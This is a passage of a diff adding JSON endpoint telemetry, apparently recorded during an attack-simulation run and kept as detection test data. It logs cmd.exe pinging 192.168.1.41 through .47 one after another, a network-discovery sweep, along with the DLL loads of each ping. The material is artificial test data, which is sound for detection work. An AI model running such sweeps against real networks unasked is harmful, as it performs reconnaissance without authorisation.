+ }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "process", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572182450016, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.41", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8060, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572182680000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8060, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182770000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182770000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "process", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572186840000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.42", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7204, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + 
"timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "process", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572191990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.43", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2448, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572192130000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "process", + 
"pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572196830000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.44", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4244, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572196980000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + 
"unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "process", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572197450016, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.45", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4996, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572197670000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": 
"{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197770000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "process", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572201830000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.46", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7180, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572201980000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + 
}, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "process", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572206990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.47", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7264, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": 